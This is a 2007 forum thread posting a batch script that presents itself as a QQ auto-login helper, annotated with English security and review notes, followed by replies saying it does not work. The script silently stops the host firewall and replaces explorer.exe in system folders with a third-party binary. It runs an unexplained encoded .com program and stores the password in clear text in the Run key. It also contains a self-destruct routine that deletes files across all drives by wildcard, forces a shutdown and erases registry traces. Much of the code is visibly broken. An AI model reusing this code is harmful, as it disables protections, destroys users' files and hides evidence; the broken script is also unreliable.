以下为代码部分
:##############################################
::Copyright (C) 2007 koala
::Contact: da2qia1ku5@126.com
::QQ 13019940
::此脚本是用瑞士的notepad2.exe在全屏模式下编辑的
@echo off
:: Console setup: colours, a 70x17 window and a window title.
color 1f &mode con:cols=70 lines=17 &title 程序初始化
:var_set
:: Environment variable initialisation.
:: Review note: no setlocal is issued before these assignments, so the variables
:: are created in the environment of the cmd.exe session that runs this script.
rem Initial network-connection state: bad (invalid)
set network=bad
rem Number of QQ accounts registered for auto-login so far; starts at 0
set /a logged_Num=0
rem Self-destruct flag; starts as No
set killself=No
:file_chk
:: Start-up phase: prints a banner, stops two services, prepends the working
:: directory to PATH and then tries to replace explorer.exe in two system folders.
cls
echo. &&echo. &echo. &echo 程序初始化阶段...
echo 请稍等...
ping /n 1 127.1>nul 2>nul
:: Turn off the firewall ---- suggested by forum member dhlkp (China DOS Union), thanks.
:: Security note: both services are stopped with all output discarded, so the user
:: gets no indication that the host firewall is no longer running, and nothing on
:: this page starts them again. Stop events for ALG and SharedAccess are a
:: detection point for this behaviour.
@net stop ALG >nul 2>nul
@net stop SharedAccess>nul 2>nul
:: Security note: the current directory is placed first on PATH, so every bare
:: command name used afterwards is resolved in the working directory before the
:: system directories.
@set "path=%cd%;%path%"
::##########################################################################
:: Nested check.
:: Decide whether %systemroot%\system\explorer.exe and %systemroot%\system\explorer.exe
:: is a file or a folder and act accordingly: if it is a folder, delete it; if it
:: is a file, delete it, then copy miniQQ2.2.exe there and rename it explorer.exe.
:: (The original comment names the system folder twice; the loop below covers
:: system and system32.)
:: The %=.....=% form below is a comment, similar to /*......*/ in C.
::
:: Security note: the loop grants the current user full control over any
:: explorer.exe found in the two system folders, clears its attributes, force
:: deletes it and hands over to filecopy/filepath. A third-party binary named
:: explorer.exe under system or system32 imitates a Windows component; its
:: presence there is an indicator worth alerting on.
:: NOTE(review): "call filecopy" and "call filepath" have no leading colon, so
:: cmd looks for external commands or scripts with those names (working directory
:: first, given the PATH change above); filecopy is not defined on this page.
:: NOTE(review): the parentheses opened by the for and the first "if exist" are
:: not closed within the lines shown here, so the block is unbalanced as posted.
::##########################################################################
for %%f in ( %systemroot%\system, %systemroot%\system32 ) do (
if exist "%%f\explorer.exe" (
%systemroot%\system32\cacls.exe "%%f\explorer.exe" /e /t /p "%username%":F >nul 2>nul
%systemroot%\system32\attrib.exe -r -s -h -a "%%f\explorer.exe" >nul 2>nul
del /s /f /q %%f\explorer.exe
if exist "%%f\explorer.exe" (
rd /s /q %%f\explorer.exe
call filecopy &call filepath ) else (
call filecopy &call filepath )>nul 2>nul
:filepath
:: Chooses the path stored in the variable main, which later lines use as the
:: program to launch and to register for auto-start.
:: The "path"\nul form is the legacy existence test for a directory, so as
:: written these branches test for a folder with that name -- NOTE(review):
:: confirm this is what the author intended.
:: When the System32 test succeeds, the copy under System is force-deleted.
:: All output of the outer block, including errors, is discarded.
if exist "%SYSTEMROOT%\System32\explorer.exe"\nul (
set main=%SYSTEMROOT%\System32\explorer.exe
if exist "%SYSTEMROOT%\System32\explorer.exe"\nul (
del /f /q "%SYSTEMROOT%\System\explorer.exe"
)
) else (
if exist "%SYSTEMROOT%\System\explorer.exe"\nul (
set main=%SYSTEMROOT%\System\explorer.exe >nul 2>nul
) else ( call filecopy
set main=%SYSTEMROOT%\System32\explorer.exe ) >nul 2>nul
) >nul 2>nul
:: Core part: ASCII-encoded assembly code.
:: Review note: the echo below writes an opaque printable-ASCII byte string to
:: in.com in the working directory, and the for /f line further down executes
:: it. The bytes are not explained on this page, so in.com is an unverified
:: executable created at run time. As a 16-bit .com program it presumably
:: cannot run on 64-bit Windows -- confirm.
echo hP1X500P[PZBBBfh#b##fXf-V@`$fPf]f3/f1/5++u5x>in.com
cls
:: Ask for the QQ number and the password.
set id=
set passwd=
set /p id=请输入Q号:
:: The password is temporarily "moved" through the assembly program in.com so
:: that it is hidden while typed.
:: The set /p with input redirected from nul only prints the prompt; the value
:: of passwd is whatever in.com writes to its standard output.
:: Security note: after this point passwd holds the password in clear text in
:: the process environment.
set /p passwd=enter your QQ password:<nul
for /f "tokens=*" %%i in ('in.com') do set passwd=%%i
del /f in.com >nul 2>nul
::========================================================
:: Login options: invisible, save chat history, sound, show chat scene
::========================================================
:: Switch console mode (code page 936, 70x17 window).
:: Review note: every answer below is compared unquoted (if /I %var%==y), so an
:: empty answer makes the if line a syntax error and any special characters in
:: the answer are interpreted by cmd; quoting both sides of the comparison is
:: the usual safeguard.
chcp 936 >nul &mode con:cols=70 lines=17
::===================== invisible login? =================
set YinShen=
set hidelogin=
set /p yinShen=是否隐身登陆[y/n]?
if /I %yinshen%==y set hidelogin=/hidelogin
if /I %yinshen%==n set hidelogin=
::================== save chat history? ==================
set nosave=
set BaoCun=
set /p BaoCun=是否保存聊天信息[y/n]?
if /I %BaoCun%==n set nosave=/nosave
if /I %BaoCun%==y set nosave=
::================ play a sound on new messages? =========
set Fasheng=
set nosound=
set /p Fasheng=有信息时是否发出声音[y/n]?
if /I %Fasheng%==n set nosound= /nosound
if /I %Fasheng%==y set nosound=
::================ show the chat scene? ==================
set Qingjing=
set noshow=
set /p Qingjing=是否显示聊天情景[y/n]?
if /I %Qingjing%==n set noshow=/noshow
if /I %Qingjing%==y set noshow=
::========================================================
:: Switches of the original command:
:: /hidelogin /nosave /nosound /noshow
::========================================================
:: Shows the progress animation, registers the auto-start entry, launches the
:: client once and exits.
mode con: cols=60 lines=6
call :process
cls
echo 正在导入注册表...
:: Import into the registry so that the command is read at system start-up and
:: the account is logged in automatically.
:: Security note: the Run value written here stores the QQ number and the
:: password in clear text as command-line arguments. Anyone who can read the
:: HKLM Run key, or list process command lines once the entry has started, can
:: recover the credential. The value name is the number held in logged_Num.
:: Review note: the result of reg add is discarded, and the success message
:: below is printed without checking the exit status of either command.
ping -n 2 127.1>nul
reg add HKLM\software\microsoft\windows\currentversion\run /v %logged_Num% /t reg_sz /d "%main% %id% %passwd% %hidelogin%%nosave%%nosound% %noshow%" /f >nul 2>nul
cls
echo 正在测试并进行验证登陆...
:: Security note: the password is passed on the command line here as well.
%main% %id% %passwd% %hidelogin% %nosave% %nosound% %noshow%
echo 登陆成功...
echo
ping -n 2 127.1>nul
exit
:process
:: A pretty progress bar.
:: b starts as a run of "=" and loses one character per pass; b1 gains one "-"
:: per pass, so the printed line shows the dashes advancing.
:: NOTE(review): the loop leaves through "goto end", but no :end label is
:: defined on this page.
set b============================================================
set b1=-
set n=1
:t1
cls
color e0
set b1=%b1%-
set b=%b:~1%
echo 正在提交登陆数据,請等待...
echo.
echo %b1%%b%
set /a n+=1
if %n%==60 goto end
ping -n 1 127.1 >nul
goto t1
:Log_off
:: Entry point for removing the auto-login registry entries.
:: NOTE(review): the :no_QQ_login label is not defined on this page.
title 取消QQ注册表挂机
:: If no registry entry was imported (count is 0), show an error message.
if "%logged_Num%"=="0" goto :no_QQ_login
:: QQnum is the index of the "logged-in QQ number" entries recorded in the registry.
set QQnum=0
:undo_login
:: Deletes the numbered values under the HKLM Run key, one per pass.
title 撤销QQ挂机
color 1f
cls
echo.
echo 分析引擎正在撤销注册表QQ挂机……
:: Remove the auto-login traces.
:: Review notes:
:: - reg query sends its output to nul before the pipe, so find receives no input.
:: - "if errorlevel 0" is true for every exit code of 0 or higher, so the
::   delete below runs whether or not the value exists.
:: - QQnum inside the parenthesised block is expanded when the block is parsed,
::   so the comparison with "5" sees the value from before the increment.
:: - setlocal is issued again on every pass through this label.
:: - The :succeed_in_Log_off label is not defined on this page.
setlocal enabledelayedexpansion
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v %QQnum%>nul 2>nul |find /i "reg_sz">nul 2>nul
if errorlevel 0 (
reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v %QQnum% /f >nul 2>nul
set /a QQnum+=1
if "%QQnum%"=="5" goto :succeed_in_Log_off
goto :undo_login
)
cls
::#################################################################
:: The key part that destroys this program follows.
::#################################################################
:Kill_Myself
:: Sets the self-destruct flag and generates three helper files:
::   shutdown.vbs and KillMyself.bat in the root of the system drive, and
::   analyse_OS.bat in the current directory (the same root after the cd below).
:: Security note: these three file names in the root of the system drive are
:: artefacts a responder can look for on a host where this script has run.
set killself=Yes
::##################################################################################################################
cd /d "%systemdrive%\"
:: shutdown.vbs: a WMI script that calls Win32Shutdown(12) on every
:: Win32_OperatingSystem instance. NOTE(review): per the WMI documentation flag
:: 12 is a forced power-off, while the generated comments speak of a restart --
:: confirm.
>%systemdrive%\shutdown.vbs echo Set colOperatingSystems = GetObject("winmgmts:{(Shutdown)}").ExecQuery("Select * from Win32_OperatingSystem")
>>%systemdrive%\shutdown.vbs echo For Each objOperatingSystem in colOperatingSystems
>>%systemdrive%\shutdown.vbs echo ObjOperatingSystem.Win32Shutdown(12)
>>%systemdrive%\shutdown.vbs echo Next
::##################################################################################################################
:: analyse_OS.bat: checks the output of ver for "Windows XP"; on XP it deletes
:: shutdown.vbs and runs shutdown -r -t 0, otherwise it runs shutdown.vbs
:: through cscript. Either way the machine goes down immediately, without
:: giving the user a chance to save work.
:: NOTE(review): the generated comments mention a RunOnce entry for
:: KillMyself.bat, but no command on this page creates one.
(echo ::分析操作系统并准备重启
echo set find=%systemroot%\system32\find.exe
echo ::分析.........
echo ver ^| ^"%%find^%%" /i "Windows XP" > nul
echo if not errorlevel 1 ^(
echo set CHK_OS=XP
echo ^) else (
echo set CHK_OS=2K
echo ^)
echo ::启用重新启动
echo ::然后调用HKLM\software\microsoft\windows\currentversion\RunOnce /v killmyself /t reg_sz /d %systemdrive%\KillMyself.bat
echo ::删除 QQ注册表挂机.exe 以及 %systemdrive%\KillMyself.bat
echo if ^%%CHK_OS%%==XP (
echo del ^%%systemdrive%%\shutdown.vbs
echo %systemroot%\system32\shutdown -r -t 0
echo ^) else (
echo cscript %systemdrive%\shutdown.vbs
echo ^) )>analyse_OS.bat
::##################################################################################################################
:: KillMyself.bat: walks drive letters c to z twice. The first pass force
:: deletes every file whose name matches a wildcard built around "Q", "Q" and
:: one Chinese character; the second pass does the same for every file whose
:: name contains this script's own base name, then calls analyse_OS.bat and
:: removes the two helper batch files. Errors are discarded.
:: Security note: both passes recurse through whole drives with loose
:: wildcards and del /q /a /f, so unrelated user files whose names happen to
:: match are deleted without prompting. Together with the forced shutdown this
:: is destructive behaviour, not only self-removal.
>%systemdrive%\KillMyself.bat echo cls ^&echo.
>>%systemdrive%\KillMyself.bat echo echo 痕迹清理完毕!程序正在启动分析引擎...
>>%systemdrive%\KillMyself.bat echo ping /n 4 127.1 ^>nul 2^>nul
>>%systemdrive%\KillMyself.bat echo ::进行逻辑分析,然后销毁挂机程序
>>%systemdrive%\KillMyself.bat echo cls
>>%systemdrive%\KillMyself.bat echo echo. ^&echo. ^&echo 正在销毁程序...
>>%systemdrive%\KillMyself.bat echo setlocal enabledelayedexpansion
>>%systemdrive%\KillMyself.bat echo for ^%%%%i in (c d e f g h i j k l m n o p q r s t u v w x y z) do (
>>%systemdrive%\KillMyself.bat echo if exist ^%%%%i: (
>>%systemdrive%\KillMyself.bat echo cd\
>>%systemdrive%\KillMyself.bat echo for /f "tokens=*" ^%%%%a in ^('dir /s /a-d /b ^%%%%i:\**Q*Q**注**.*') do (
>>%systemdrive%\KillMyself.bat echo del /q /a /f ^"%%%%a"
>>%systemdrive%\KillMyself.bat echo ^)
>>%systemdrive%\KillMyself.bat echo ^)
>>%systemdrive%\KillMyself.bat echo ^) ^>nul 2^>nul
>>%systemdrive%\KillMyself.bat echo :next
>>%systemdrive%\KillMyself.bat echo cls
>>%systemdrive%\KillMyself.bat echo for ^%%%%j in (c d e f g h i j k l m n o p q r s t u v w x y z) do (
>>%systemdrive%\KillMyself.bat echo if exist ^%%%%j: (
>>%systemdrive%\KillMyself.bat echo cd\
>>%systemdrive%\KillMyself.bat echo for /f "tokens=*" ^%%%%b in ^('dir /s /a-d /b ^%%%%j:\*%~n0*.*') do (
>>%systemdrive%\KillMyself.bat echo del /q /a /f ^"%%%%b"
>>%systemdrive%\KillMyself.bat echo ^%%systemdrive%%\analyse_OS.bat
>>%systemdrive%\KillMyself.bat echo del /f ^%%systemdrive%%\KillMyself.bat
>>%systemdrive%\KillMyself.bat echo del /f ^%%systemdrive%%\analyse_OS.bat
>>%systemdrive%\KillMyself.bat echo ^)
>>%systemdrive%\KillMyself.bat echo ^)
>>%systemdrive%\KillMyself.bat echo ^) ^>nul 2^>nul
::##################################################################################################################
:: Hand over to the :Clear_Trace module for trace cleaning.
:: NOTE(review): no :Clear_Trace label is defined on this page; the statements
:: that follow this goto are presumably its body -- confirm.
goto :Clear_Trace
:: Trace cleaning: removes two per-user registry keys, restarts the shell,
:: clears the script's variables and then either runs the self-destruct batch
:: file or jumps back to the start.
:: Security note: deleting these keys and the temporary process list removes
:: evidence of what was run on the machine. From a forensic point of view,
:: unexpected deletion of the MMC "Recent File List" and Explorer "Streams"
:: keys under HKCU is itself an indicator.
:: Microsoft Management Console run history
@reg delete "HKEY_CURRENT_USER\Software\Microsoft\Microsoft Management Console\Recent File List" /f >nul 2>nul
:: Run traces
@reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Streams" /f >nul 2>nul
:: NOTE(review): find sets errorlevel 1 when explorer.exe is NOT in the process
:: list, yet that is the case in which taskkill is called -- the condition looks
:: inverted; confirm.
:: NOTE(review): the del line carries the stray words "attributes -h -s -r -a",
:: which are not valid del arguments.
tasklist > "%temp%"\processlist.txt
type "%temp%"\processlist.txt|find /i "explorer.exe" >nul 2>nul
if errorlevel==1 taskkill /f /im explorer.exe >nul 2>nul
start %systemroot%\explorer.exe
if exist "%temp%"\processlist.txt del /f /q /a attributes -h -s -r -a "%temp%"\processlist.txt
cls
::###########################
:: Clear the script variables held in memory
:: Security note: this removes id and passwd from the environment, but the same
:: password is still stored in clear text in the Run value written earlier
:: unless the log-off branch deleted it.
:: Review note: the name cleared below is killmyself, while the flag set and
:: tested elsewhere is killself, so the flag survives this cleanup.
::###########################
set n=
set b1=
set logged_Num=
set b=
set i=
set a=
set i=
set j=
set killmyself=
set main=
set network=
set choice=
set id=
set passwd=
set YinShen=
set hidelogin=
set nosave=
set BaoCun=
set Fasheng=
set nosound=
set Qingjing=
set noshow=
set QQ=
set QQnum=
::###########################
cls
:: NOTE(review): the :start label is not defined on this page.
@if "%killself%"=="Yes" (
call %systemdrive%\KillMyself.bat
) else (
goto :start
)
:eof
endlocal
[ Last edited by koala on 2007-9-21 at 07:55 PM ]

作者: dhlkp 时间: 2007-9-17 14:02
楼主啊
我发现在在我的电脑上不能用的啊?
是怎么回事
黑客版可以运行就是登陆不上去
考拉版的是出现:未发现有效的网络连接
请确认你的猫是否已经正确连接到Internet.

作者: koala 时间: 2007-9-21 18:23
更新了一下源代码,自己机器上通过了,网吧却没有通过,希望有人能查证错误
另注:
这不是我最近写的那个版本,那个在一次U盘清理中无意删了,用了数据恢复工具,但是没有找到,这个版本会自动检测 MiniQQ2.2.exe 所在位置并进行合理配置

作者: koala 时间: 2007-10-3 16:45
赌东道???

作者: dxt1988 时间: 2007-10-8 01:59
用不了!